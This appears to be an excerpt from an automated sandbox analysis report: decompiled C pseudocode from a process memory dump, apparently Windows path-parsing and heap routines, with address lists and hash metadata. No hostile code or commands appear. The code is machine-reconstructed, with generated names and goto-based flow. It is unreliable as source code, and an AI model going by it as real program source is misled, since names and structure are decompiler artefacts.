                                                              																_t334 = 0;
                                                              															}
                                                              															_t336 = _t334 & 0x000000ff;
                                                              															__eflags = _t336;
                                                              															_t427 =  *(_t528 - 0x88);
                                                              															if(_t336 == 0) {
                                                              																_t481 = _t479 + _t506;
                                                              																__eflags = _t481;
                                                              																 *(_t528 - 0x78) = _t481;
                                                              																E0102F3E0(_t479 + _t427, _t457, _t506);
                                                              																_t529 = _t529 + 0xc;
                                                              															} else {
                                                              																_t340 = _t336 - 1;
                                                              																__eflags = _t340;
                                                              																if(_t340 == 0) {
                                                              																	E0102F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                              																	_t529 = _t529 + 0xc;
                                                              																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                              																} else {
                                                              																	__eflags = _t340 == 0;
                                                              																	if(_t340 == 0) {
                                                              																		__eflags = _t506 - 8;
                                                              																		if(_t506 == 8) {
                                                              																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                              																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                              																		}
                                                              																	}
                                                              																}
                                                              															}
                                                              															_t339 = 0x10;
                                                              															_t519 = _t519 + _t339;
                                                              															_t263 = _t528 - 0x8c;
                                                              															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                              															__eflags =  *_t263;
                                                              															_t479 =  *(_t528 - 0x78);
                                                              														} while ( *_t263 != 0);
                                                              														goto L87;
                                                              													}
                                                              												}
                                                              											} else {
                                                              												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                              												 *(_t528 - 0xa2) = _t392;
                                                              												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                              												__eflags = _t469;
                                                              												while(1) {
                                                              													 *(_t528 - 0xe4) = _t511;
                                                              													__eflags = _t392;
                                                              													_t393 = _t427;
                                                              													if(_t392 != 0) {
                                                              														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                              													}
                                                              													_t395 = (_t393 & 0x000000ff) - _t427;
                                                              													__eflags = _t395;
                                                              													if(_t395 == 0) {
                                                              														_t511 = _t511 +  *_t469;
                                                              														__eflags = _t511;
                                                              													} else {
                                                              														_t398 = _t395 - 1;
                                                              														__eflags = _t398;
                                                              														if(_t398 == 0) {
                                                              															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                              															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                              														} else {
                                                              															__eflags = _t398 == 1;
                                                              															if(_t398 == 1) {
                                                              																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                              																_t402 =  *_t469 & 0x0000ffff;
                                                              																 *(_t528 - 0xac) = _t402;
                                                              																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                              															}
                                                              														}
                                                              													}
                                                              													__eflags = _t511 -  *(_t528 - 0xe4);
                                                              													if(_t511 <  *(_t528 - 0xe4)) {
                                                              														break;
                                                              													}
                                                              													_t397 =  *(_t528 - 0x88) + 1;
                                                              													 *(_t528 - 0x88) = _t397;
                                                              													_t469 = _t469 + 0x10;
                                                              													__eflags = _t397 -  *(_t528 + 0x1c);
                                                              													_t392 =  *(_t528 - 0xa2);
                                                              													if(_t397 <  *(_t528 + 0x1c)) {
                                                              														continue;
                                                              													}
                                                              													goto L45;
                                                              												}
                                                              												_t475 = 0x216;
                                                              												 *(_t528 - 0x74) = 0x216;
                                                              												goto L45;
                                                              											}
                                                              										} else {
                                                              											asm("lock dec dword [eax+ecx*8+0x4]");
                                                              											goto L16;
                                                              										}
                                                              									}
                                                              									_t491 = E010B4CAB(_t306, _t528 - 0xa4);
                                                              									 *(_t528 - 0x74) = _t491;
                                                              									__eflags = _t491;
                                                              									if(_t491 != 0) {
                                                              										goto L91;
                                                              									} else {
                                                              										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                              										goto L20;
                                                              									}
                                                              								}
                                                              								L16:
                                                              								 *(_t528 - 0x74) = 0x1069;
                                                              								L93:
                                                              								_t298 =  *(_t528 - 0xd0) + 1;
                                                              								 *(_t528 - 0xd0) = _t298;
                                                              								_t474 = _t474 + _t511;
                                                              								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                              								_t494 = 4;
                                                              								__eflags = _t298 - _t494;
                                                              								if(_t298 >= _t494) {
                                                              									goto L100;
                                                              								}
                                                              								_t494 =  *(_t528 - 0xcc);
                                                              								_t435 = _t298;
                                                              								continue;
                                                              							}
                                                              							__eflags = _t494[2] | _t494[3];
                                                              							if((_t494[2] | _t494[3]) == 0) {
                                                              								goto L15;
                                                              							}
                                                              							goto L12;
                                                              						}
                                                              						__eflags = _t301;
                                                              						if(_t301 != 0) {
                                                              							goto L92;
                                                              						}
                                                              						goto L10;
                                                              						L92:
                                                              						goto L93;
                                                              					}
                                                              				} else {
                                                              					_push(0x57);
                                                              					L101:
                                                              					return E0103D130(_t427, _t494, _t511);
                                                              				}
                                                              			}
                                                              0x00000000
                                                              0x010b5d20
                                                              0x010b5d22
                                                              0x010b5d25
                                                              0x010b5d2f
                                                              0x010b5d2f
                                                              0x010b5d33
                                                              0x010b5d3d
                                                              0x010b5d49
                                                              0x010b5d4b
                                                              0x00000000
                                                              0x00000000
                                                              0x010b5d5a
                                                              0x010b5d5d
                                                              0x010b5d60
                                                              0x00000000
                                                              0x00000000
                                                              0x010b5d66
                                                              0x010b5d69
                                                              0x00000000
                                                              0x00000000
                                                              0x010b5d6f
                                                              0x010b5d6f
                                                              0x010b5d73
                                                              0x010b5d79
                                                              0x010b5d7f
                                                              0x010b5d86
                                                              0x010b5d95
                                                              0x010b5d98
                                                              0x010b5dba
                                                              0x010b5dcb
                                                              0x010b5dce
                                                              0x010b5dd3
                                                              0x010b5dd6
                                                              0x010b5dd8
                                                              0x010b5de6
                                                              0x010b5dec
                                                              0x010b5dee
                                                              0x010b5df1
                                                              0x010b5df3
                                                              0x010b635a
                                                              0x010b635a
                                                              0x00000000
                                                              0x010b635a
                                                              0x010b5dfe
                                                              0x010b5e02
                                                              0x010b5e05
                                                              0x010b5e07
                                                              0x010b5e10
                                                              0x010b5e13
                                                              0x010b5e1b
                                                              0x010b5e1c
                                                              0x010b5e21
                                                              0x010b5e22
                                                              0x010b5e23
                                                              0x010b5e25
                                                              0x010b5e2a
                                                              0x010b5e2c
                                                              0x010b5e2e
                                                              0x010b5e36
                                                              0x010b5e39
                                                              0x010b5e42
                                                              0x010b5e47
                                                              0x010b5e4d
                                                              0x010b5e54
                                                              0x010b5e54
                                                              0x010b5e54
                                                              0x010b5e2e
                                                              0x010b5e5c
                                                              0x010b5e5f
                                                              0x010b5e62
                                                              0x010b5e64
                                                              0x010b5e6b
                                                              0x010b5e70
                                                              0x010b5e7a
                                                              0x010b5e7a
                                                              0x010b5e7a
                                                              0x010b5e6b
                                                              0x010b5e7e
                                                              0x010b5e7f
                                                              0x010b5e7f
                                                              0x010b5e81
                                                              0x010b5e87
                                                              0x010b5e8b
                                                              0x010b5e8c
                                                              0x010b5e8c
                                                              0x010b5e8c
                                                              0x010b5e9a
                                                              0x010b5e9c
                                                              0x010b5ea2
                                                              0x010b5ea6
                                                              0x010b5f50
                                                              0x010b5f50
                                                              0x010b5f57
                                                              0x010b5f66
                                                              0x010b5f66
                                                              0x010b5f66
                                                              0x010b5f68
                                                              0x010b5f6a
                                                              0x010b63d0
                                                              0x00000000
                                                              0x010b5f70
                                                              0x010b5f70
                                                              0x010b5f91
                                                              0x010b5f9c
                                                              0x010b5f9e
                                                              0x010b5fa4
                                                              0x010b5fa6
                                                              0x010b638c
                                                              0x010b6392
                                                              0x010b63a1
                                                              0x010b63a7
                                                              0x010b63af
                                                              0x010b63af
                                                              0x010b63bd
                                                              0x010b63d8
                                                              0x00000000
                                                              0x010b63d8
                                                              0x010b5fac
                                                              0x010b5fb2
                                                              0x010b5fb4
                                                              0x010b5fbd
                                                              0x010b5fc6
                                                              0x010b5fce
                                                              0x010b5fd4
                                                              0x010b5fdc
                                                              0x010b5fec
                                                              0x010b5fed
                                                              0x010b5fee
                                                              0x010b5fef
                                                              0x010b5ff9
                                                              0x010b5ffa
                                                              0x010b5ffb
                                                              0x010b5ffc
                                                              0x010b6000
                                                              0x010b6004
                                                              0x010b6012
                                                              0x010b6012
                                                              0x010b6018
                                                              0x010b6019
                                                              0x010b601a
                                                              0x010b601b
                                                              0x010b601c
                                                              0x010b6020
                                                              0x010b6059
                                                              0x010b605c
                                                              0x010b6061
                                                              0x010b6061
                                                              0x010b6022
                                                              0x010b6022
                                                              0x010b6022
                                                              0x010b6025
                                                              0x010b602a
                                                              0x010b602b
                                                              0x010b6031
                                                              0x010b6037
                                                              0x010b6038
                                                              0x010b603e
                                                              0x010b6048
                                                              0x010b6049
                                                              0x010b604a
                                                              0x010b604b
                                                              0x010b604c
                                                              0x010b604d
                                                              0x010b6053
                                                              0x010b6054
                                                              0x010b6054
                                                              0x010b6062
                                                              0x010b6065
                                                              0x010b6067
                                                              0x010b606a
                                                              0x010b6070
                                                              0x010b6075
                                                              0x010b6076
                                                              0x010b6081
                                                              0x010b6087
                                                              0x010b6095
                                                              0x010b6099
                                                              0x010b609e
                                                              0x010b60a4
                                                              0x010b60ae
                                                              0x010b60b0
                                                              0x010b60b3
                                                              0x010b60b6
                                                              0x010b60b8
                                                              0x010b60ba
                                                              0x010b60ba
                                                              0x010b60ba
                                                              0x010b60ba
                                                              0x010b60be
                                                              0x010b60c0
                                                              0x010b60c5
                                                              0x010b60c5
                                                              0x010b60c5
                                                              0x010b60c6
                                                              0x010b60cd
                                                              0x010b6114
                                                              0x010b60cf
                                                              0x010b60cf
                                                              0x010b60d4
                                                              0x010b60d5
                                                              0x010b60da
                                                              0x010b60db
                                                              0x010b60e1
                                                              0x010b60e2
                                                              0x010b60e8
                                                              0x010b60f8
                                                              0x010b60fd
                                                              0x010b60fe
                                                              0x010b6102
                                                              0x010b6104
                                                              0x010b6107
                                                              0x010b6109
                                                              0x010b610b
                                                              0x010b610b
                                                              0x010b610b
                                                              0x010b610b
                                                              0x010b610f
                                                              0x010b610f
                                                              0x010b6117
                                                              0x010b611a
                                                              0x010b611f
                                                              0x010b6125
                                                              0x010b6134
                                                              0x010b6139
                                                              0x010b613f
                                                              0x010b6146
                                                              0x010b6148
                                                              0x010b614b
                                                              0x010b614d
                                                              0x010b614f
                                                              0x010b614f
                                                              0x010b614f
                                                              0x010b614f
                                                              0x010b6153
                                                              0x010b6159
                                                              0x010b6159
                                                              0x010b615c
                                                              0x010b6163
                                                              0x010b6169
                                                              0x010b616c
                                                              0x010b6172
                                                              0x010b6181
                                                              0x010b6186
                                                              0x010b6187
                                                              0x010b618b
                                                              0x010b6191
                                                              0x010b6195
                                                              0x010b61a3
                                                              0x010b61bb
                                                              0x010b61c0
                                                              0x010b61c3
                                                              0x010b61cc
                                                              0x010b61d0
                                                              0x010b61dc
                                                              0x010b61de
                                                              0x010b61e1
                                                              0x010b61e4
                                                              0x010b61e6
                                                              0x010b61e8
                                                              0x010b61e8
                                                              0x010b61e8
                                                              0x010b61e8
                                                              0x010b61e6
                                                              0x010b61ec
                                                              0x010b61f3
                                                              0x010b6203
                                                              0x010b6209
                                                              0x010b620a
                                                              0x010b6216
                                                              0x010b621d
                                                              0x010b6227
                                                              0x010b6241
                                                              0x010b6246
                                                              0x010b624c
                                                              0x010b6257
                                                              0x010b6259
                                                              0x010b625c
                                                              0x010b625e
                                                              0x010b6260
                                                              0x010b6260
                                                              0x010b6260
                                                              0x010b6260
                                                              0x010b625e
                                                              0x010b6264
                                                              0x010b6267
                                                              0x010b6269
                                                              0x010b6315
                                                              0x010b6315
                                                              0x010b631b
                                                              0x010b631e
                                                              0x010b6324
                                                              0x010b6327
                                                              0x010b632f
                                                              0x010b6330
                                                              0x010b6333
                                                              0x010b633a
                                                              0x010b633c
                                                              0x010b6335
                                                              0x010b6335
                                                              0x010b6335
                                                              0x010b633f
                                                              0x010b6342
                                                              0x010b634c
                                                              0x010b6352
                                                              0x010b6355
                                                              0x010b6355
                                                              0x010b6359
                                                              0x00000000
                                                              0x010b626f
                                                              0x010b6275
                                                              0x010b6275
                                                              0x010b6278
                                                              0x010b627e
                                                              0x010b627e
                                                              0x010b6281
                                                              0x010b6287
                                                              0x010b628d
                                                              0x010b6298
                                                              0x010b629c
                                                              0x010b62a2
                                                              0x010b629e
                                                              0x010b629e
                                                              0x010b629e
                                                              0x010b62a7
                                                              0x010b62a7
                                                              0x010b62aa
                                                              0x010b62b0
                                                              0x010b62f0
                                                              0x010b62f0
                                                              0x010b62f2
                                                              0x010b62f8
                                                              0x010b62fd
                                                              0x010b62b2
                                                              0x010b62b2
                                                              0x010b62b2
                                                              0x010b62b5
                                                              0x010b62dd
                                                              0x010b62e2
                                                              0x010b62e5
                                                              0x010b62b7
                                                              0x010b62b8
                                                              0x010b62bb
                                                              0x010b62bd
                                                              0x010b62c0
                                                              0x010b62c4
                                                              0x010b62cd
                                                              0x010b62cd
                                                              0x010b62c0
                                                              0x010b62bb
                                                              0x010b62b5
                                                              0x010b6302
                                                              0x010b6303
                                                              0x010b6305
                                                              0x010b6305
                                                              0x010b6305
                                                              0x010b630c
                                                              0x010b630c
                                                              0x00000000
                                                              0x010b627e
                                                              0x010b6269
                                                              0x010b5eac
                                                              0x010b5ebb
                                                              0x010b5ebe
                                                              0x010b5ecb
                                                              0x010b5ecb
                                                              0x010b5ece
                                                              0x010b5ece
                                                              0x010b5ed4
                                                              0x010b5ed7
                                                              0x010b5ed9
                                                              0x010b5edb
                                                              0x010b5edb
                                                              0x010b5ee1
                                                              0x010b5ee1
                                                              0x010b5ee3
                                                              0x010b5f20
                                                              0x010b5f20
                                                              0x010b5ee5
                                                              0x010b5ee5
                                                              0x010b5ee5
                                                              0x010b5ee8
                                                              0x010b5f11

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 95aa16ea2516f0dfb26490a8b731dafcb3e68955373fb0c10d72aab8068b533b
                                                              • Instruction ID: bbdfdef7dd33e46af40618fbcafff32cf3e695039f872339ba39271305e0eed4
                                                              • Opcode Fuzzy Hash: 95aa16ea2516f0dfb26490a8b731dafcb3e68955373fb0c10d72aab8068b533b
                                                              • Instruction Fuzzy Hash: CF42487590122A8FDB64CF68C880BE9BBF1FF49704F1481EAD98DAB242D7359985CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E01004120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                              				signed int _v8;
                                                              				void* _v20;
                                                              				signed int _v24;
                                                              				char _v532;
                                                              				char _v540;
                                                              				signed short _v544;
                                                              				signed int _v548;
                                                              				signed short* _v552;
                                                              				signed short _v556;
                                                              				signed short* _v560;
                                                              				signed short* _v564;
                                                              				signed short* _v568;
                                                              				void* _v570;
                                                              				signed short* _v572;
                                                              				signed short _v576;
                                                              				signed int _v580;
                                                              				char _v581;
                                                              				void* _v584;
                                                              				unsigned int _v588;
                                                              				signed short* _v592;
                                                              				void* _v597;
                                                              				void* _v600;
                                                              				void* _v604;
                                                              				void* _v609;
                                                              				void* _v616;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				unsigned int _t161;
                                                              				signed int _t162;
                                                              				unsigned int _t163;
                                                              				void* _t169;
                                                              				signed short _t173;
                                                              				signed short _t177;
                                                              				signed short _t181;
                                                              				unsigned int _t182;
                                                              				signed int _t185;
                                                              				signed int _t213;
                                                              				signed int _t225;
                                                              				short _t233;
                                                              				signed char _t234;
                                                              				signed int _t242;
                                                              				signed int _t243;
                                                              				signed int _t244;
                                                              				signed int _t245;
                                                              				signed int _t250;
                                                              				void* _t251;
                                                              				signed short* _t254;
                                                              				void* _t255;
                                                              				signed int _t256;
                                                              				void* _t257;
                                                              				signed short* _t260;
                                                              				signed short _t265;
                                                              				signed short* _t269;
                                                              				signed short _t271;
                                                              				signed short** _t272;
                                                              				signed short* _t275;
                                                              				signed short _t282;
                                                              				signed short _t283;
                                                              				signed short _t290;
                                                              				signed short _t299;
                                                              				signed short _t307;
                                                              				signed int _t308;
                                                              				signed short _t311;
                                                              				signed short* _t315;
                                                              				signed short _t316;
                                                              				void* _t317;
                                                              				void* _t319;
                                                              				signed short* _t321;
                                                              				void* _t322;
                                                              				void* _t323;
                                                              				unsigned int _t324;
                                                              				signed int _t325;
                                                              				void* _t326;
                                                              				signed int _t327;
                                                              				signed int _t329;
                                                              
                                                              				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                              				_v8 =  *0x10dd360 ^ _t329;
                                                              				_t157 = _a8;
                                                              				_t321 = _a4;
                                                              				_t315 = __edx;
                                                              				_v548 = __ecx;
                                                              				_t305 = _a20;
                                                              				_v560 = _a12;
                                                              				_t260 = _a16;
                                                              				_v564 = __edx;
                                                              				_v580 = _a8;
                                                              				_v572 = _t260;
                                                              				_v544 = _a20;
                                                              				if( *__edx <= 8) {
                                                              					L3:
                                                              					if(_t260 != 0) {
                                                              						 *_t260 = 0;
                                                              					}
                                                              					_t254 =  &_v532;
                                                              					_v588 = 0x208;
                                                              					if((_v548 & 0x00000001) != 0) {
                                                              						_v556 =  *_t315;
                                                              						_v552 = _t315[2];
                                                              						_t161 = E0101F232( &_v556);
                                                              						_t316 = _v556;
                                                              						_v540 = _t161;
                                                              						goto L17;
                                                              					} else {
                                                              						_t306 = 0x208;
                                                              						_t298 = _t315;
                                                              						_t316 = E01006E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                              						if(_t316 == 0) {
                                                              							L68:
                                                              							_t322 = 0xc0000033;
                                                              							goto L39;
                                                              						} else {
                                                              							while(_v581 == 0) {
                                                              								_t233 = _v588;
                                                              								if(_t316 > _t233) {
                                                              									_t234 = _v548;
                                                              									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                              										_t254 = L01004620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                              										if(_t254 == 0) {
                                                              											_t169 = 0xc0000017;
                                                              										} else {
                                                              											_t298 = _v564;
                                                              											_v588 = _t316;
                                                              											_t306 = _t316;
                                                              											_t316 = E01006E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                              											if(_t316 != 0) {
                                                              												continue;
                                                              											} else {
                                                              												goto L68;
                                                              											}
                                                              										}
                                                              									} else {
                                                              										goto L90;
                                                              									}
                                                              								} else {
                                                              									_v556 = _t316;
                                                              									 *((short*)(_t329 + 0x32)) = _t233;
                                                              									_v552 = _t254;
                                                              									if(_t316 < 2) {
                                                              										L11:
                                                              										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                              											_t161 = 5;
                                                              										} else {
                                                              											if(_t316 < 6) {
                                                              												L87:
                                                              												_t161 = 3;
                                                              											} else {
                                                              												_t242 = _t254[2] & 0x0000ffff;
                                                              												if(_t242 != 0x5c) {
                                                              													if(_t242 == 0x2f) {
                                                              														goto L16;
                                                              													} else {
                                                              														goto L87;
                                                              													}
                                                              													goto L101;
                                                              												} else {
                                                              													L16:
                                                              													_t161 = 2;
                                                              												}
                                                              											}
                                                              										}
                                                              									} else {
                                                              										_t243 =  *_t254 & 0x0000ffff;
                                                              										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                              											if(_t316 < 4) {
                                                              												L81:
                                                              												_t161 = 4;
                                                              												goto L17;
                                                              											} else {
                                                              												_t244 = _t254[1] & 0x0000ffff;
                                                              												if(_t244 != 0x5c) {
                                                              													if(_t244 == 0x2f) {
                                                              														goto L60;
                                                              													} else {
                                                              														goto L81;
                                                              													}
                                                              												} else {
                                                              													L60:
                                                              													if(_t316 < 6) {
                                                              														L83:
                                                              														_t161 = 1;
                                                              														goto L17;
                                                              													} else {
                                                              														_t245 = _t254[2] & 0x0000ffff;
                                                              														if(_t245 != 0x2e) {
                                                              															if(_t245 == 0x3f) {
                                                              																goto L62;
                                                              															} else {
                                                              																goto L83;
                                                              															}
                                                              														} else {
                                                              															L62:
                                                              															if(_t316 < 8) {
                                                              																L85:
                                                              																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                              																goto L17;
                                                              															} else {
                                                              																_t250 = _t254[3] & 0x0000ffff;
                                                              																if(_t250 != 0x5c) {
                                                              																	if(_t250 == 0x2f) {
                                                              																		goto L64;
                                                              																	} else {
                                                              																		goto L85;
                                                              																	}
                                                              																} else {
                                                              																	L64:
                                                              																	_t161 = 6;
                                                              																	goto L17;
                                                              																}
                                                              															}
                                                              														}
                                                              													}
                                                              												}
                                                              											}
                                                              											goto L101;
                                                              										} else {
                                                              											goto L11;
                                                              										}
                                                              									}
                                                              									L17:
                                                              									if(_t161 != 2) {
                                                              										_t162 = _t161 - 1;
                                                              										if(_t162 > 5) {
                                                              											goto L18;
                                                              										} else {
                                                              											switch( *((intOrPtr*)(_t162 * 4 +  &M010045F8))) {
                                                              												case 0:
                                                              													_v568 = 0xfc1078;
                                                              													__eax = 2;
                                                              													goto L20;
                                                              												case 1:
                                                              													goto L18;
                                                              												case 2:
                                                              													_t163 = 4;
                                                              													goto L19;
                                                              											}
                                                              										}
                                                              										goto L41;
                                                              									} else {
                                                              										L18:
                                                              										_t163 = 0;
                                                              										L19:
                                                              										_v568 = 0xfc11c4;
                                                              									}
                                                              									L20:
                                                              									_v588 = _t163;
                                                              									_v564 = _t163 + _t163;
                                                              									_t306 =  *_v568 & 0x0000ffff;
                                                              									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                              									_v576 = _t265;
                                                              									if(_t265 > 0xfffe) {
                                                              										L90:
                                                              										_t322 = 0xc0000106;
                                                              									} else {
                                                              										if(_t321 != 0) {
                                                              											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                              												if(_v580 != 0) {
                                                              													goto L23;
                                                              												} else {
                                                              													_t322 = 0xc0000106;
                                                              													goto L39;
                                                              												}
                                                              											} else {
                                                              												_t177 = _t306;
                                                              												goto L25;
                                                              											}
                                                              											goto L101;
                                                              										} else {
                                                              											if(_v580 == _t321) {
                                                              												_t322 = 0xc000000d;
                                                              											} else {
                                                              												L23:
                                                              												_t173 = L01004620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                              												_t269 = _v592;
                                                              												_t269[2] = _t173;
                                                              												if(_t173 == 0) {
                                                              													_t322 = 0xc0000017;
                                                              												} else {
                                                              													_t316 = _v556;
                                                              													 *_t269 = 0;
                                                              													_t321 = _t269;
                                                              													_t269[1] = _v576;
                                                              													_t177 =  *_v568 & 0x0000ffff;
                                                              													L25:
                                                              													_v580 = _t177;
                                                              													if(_t177 == 0) {
                                                              														L29:
                                                              														_t307 =  *_t321 & 0x0000ffff;
                                                              													} else {
                                                              														_t290 =  *_t321 & 0x0000ffff;
                                                              														_v576 = _t290;
                                                              														_t310 = _t177 & 0x0000ffff;
                                                              														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                              															_t307 =  *_t321 & 0xffff;
                                                              														} else {
                                                              															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                              															E0102F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                              															_t329 = _t329 + 0xc;
                                                              															_t311 = _v580;
                                                              															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                              															 *_t321 = _t225;
                                                              															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                              																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              															}
                                                              															goto L29;
                                                              														}
                                                              													}
                                                              													_t271 = _v556 - _v588 + _v588;
                                                              													_v580 = _t307;
                                                              													_v576 = _t271;
                                                              													if(_t271 != 0) {
                                                              														_t308 = _t271 & 0x0000ffff;
                                                              														_v588 = _t308;
                                                              														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                              															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                              															E0102F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                              															_t329 = _t329 + 0xc;
                                                              															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                              															 *_t321 = _t213;
                                                              															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                              																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                              															}
                                                              														}
                                                              													}
                                                              													_t272 = _v560;
                                                              													if(_t272 != 0) {
                                                              														 *_t272 = _t321;
                                                              													}
                                                              													_t306 = 0;
                                                              													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              													_t275 = _v572;
                                                              													if(_t275 != 0) {
                                                              														_t306 =  *_t275;
                                                              														if(_t306 != 0) {
                                                              															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                              														}
                                                              													}
                                                              													_t181 = _v544;
                                                              													if(_t181 != 0) {
                                                              														 *_t181 = 0;
                                                              														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                              														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                              														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                              														if(_v540 == 5) {
                                                              															_t182 = E00FE52A5(1);
                                                              															_v588 = _t182;
                                                              															if(_t182 == 0) {
                                                              																E00FFEB70(1, 0x10d79a0);
                                                              																goto L38;
                                                              															} else {
                                                              																_v560 = _t182 + 0xc;
                                                              																_t185 = E00FFAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                              																if(_t185 == 0) {
                                                              																	_t324 = _v588;
                                                              																	goto L97;
                                                              																} else {
                                                              																	_t306 = _v544;
                                                              																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                              																	 *(_t306 + 4) = _t282;
                                                              																	_v576 = _t282;
                                                              																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                              																	 *_t306 = _t325;
                                                              																	if( *_t282 == 0x5c) {
                                                              																		_t149 = _t325 - 2; // -2
                                                              																		_t283 = _t149;
                                                              																		 *_t306 = _t283;
                                                              																		 *(_t306 + 4) = _v576 + 2;
                                                              																		_t185 = _t283 & 0x0000ffff;
                                                              																	}
                                                              																	_t324 = _v588;
                                                              																	 *(_t306 + 2) = _t185;
                                                              																	if((_v548 & 0x00000002) == 0) {
                                                              																		L97:
                                                              																		asm("lock xadd [esi], eax");
                                                              																		if((_t185 | 0xffffffff) == 0) {
                                                              																			_push( *((intOrPtr*)(_t324 + 4)));
                                                              																			E010295D0();
                                                              																			L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                              																		}
                                                              																	} else {
                                                              																		 *(_t306 + 0xc) = _t324;
                                                              																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                              																	}
                                                              																	goto L38;
                                                              																}
                                                              															}
                                                              															goto L41;
                                                              														}
                                                              													}
                                                              													L38:
                                                              													_t322 = 0;
                                                              												}
                                                              											}
                                                              										}
                                                              									}
                                                              									L39:
                                                              									if(_t254 !=  &_v532) {
                                                              										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                              									}
                                                              									_t169 = _t322;
                                                              								}
                                                              								goto L41;
                                                              							}
                                                              							goto L68;
                                                              						}
                                                              					}
                                                              					L41:
                                                              					_pop(_t317);
                                                              					_pop(_t323);
                                                              					_pop(_t255);
                                                              					return E0102B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                              				} else {
                                                              					_t299 = __edx[2];
                                                              					if( *_t299 == 0x5c) {
                                                              						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                              						if(_t256 != 0x5c) {
                                                              							if(_t256 != 0x3f) {
                                                              								goto L2;
                                                              							} else {
                                                              								goto L50;
                                                              							}
                                                              						} else {
                                                              							L50:
                                                              							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                              								goto L2;
                                                              							} else {
                                                              								_t251 = E01023D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                              								_pop(_t319);
                                                              								_pop(_t326);
                                                              								_pop(_t257);
                                                              								return E0102B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                              							}
                                                              						}
                                                              					} else {
                                                              						L2:
                                                              						_t260 = _v572;
                                                              						goto L3;
                                                              					}
                                                              				}
                                                              				L101:
                                                              			}
                                                              0x0104e261
                                                              0x0104e261
                                                              0x01004555
                                                              0x01004559
                                                              0x0100455d
                                                              0x0104e26d
                                                              0x0104e270
                                                              0x0104e274
                                                              0x0104e27a
                                                              0x0104e27d
                                                              0x0104e28e
                                                              0x0104e28e
                                                              0x01004563
                                                              0x01004563
                                                              0x01004569
                                                              0x01004569
                                                              0x00000000
                                                              0x0100455d
                                                              0x0100450f
                                                              0x00000000
                                                              0x010044f3
                                                              0x010043ff
                                                              0x01004405
                                                              0x01004405
                                                              0x01004405
                                                              0x010042ac
                                                              0x0100428c
                                                              0x01004282
                                                              0x01004407
                                                              0x0100440d
                                                              0x0104e2af
                                                              0x0104e2af
                                                              0x01004413
                                                              0x01004413
                                                              0x00000000
                                                              0x010041d4
                                                              0x00000000
